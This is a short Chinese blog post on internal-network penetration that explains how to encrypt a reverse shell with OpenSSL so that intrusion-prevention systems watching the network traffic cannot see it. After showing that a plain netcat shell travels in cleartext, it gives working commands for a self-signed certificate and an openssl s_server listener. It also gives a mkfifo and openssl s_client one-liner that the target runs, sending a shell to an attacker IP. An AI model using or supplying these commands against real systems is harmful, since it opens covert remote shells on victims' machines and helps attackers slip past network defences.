【内网渗透】openssl反弹流量加密shell

文章目录

  • openssl反弹流量加密shell

openssl反弹流量加密shell

先正常反弹shell使用wireshark抓取流量
nc监听端口
【内网渗透】openssl反弹流量加密shell_第1张图片
反弹shell
在这里插入图片描述
查看wireshark抓取的流量,发现通过明文传输

【内网渗透】openssl反弹流量加密shell_第2张图片
这样会被内网一些ips等安全防护设备发现流量进行阻断
使用openssl反弹加密shell
使用kaliopenssl生成自签名证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
【内网渗透】openssl反弹流量加密shell_第3张图片
监听端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 8080
在这里插入图片描述
目标机执行
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.80.130:8080>/tmp/s; rm /tmp/s
【内网渗透】openssl反弹流量加密shell_第4张图片
可以正常执行命令
【内网渗透】openssl反弹流量加密shell_第5张图片
使用wireshark抓取流量,流量已经加密
【内网渗透】openssl反弹流量加密shell_第6张图片

你可能感兴趣的:(内网渗透,渗透测试,信息安全,安全漏洞,网络安全)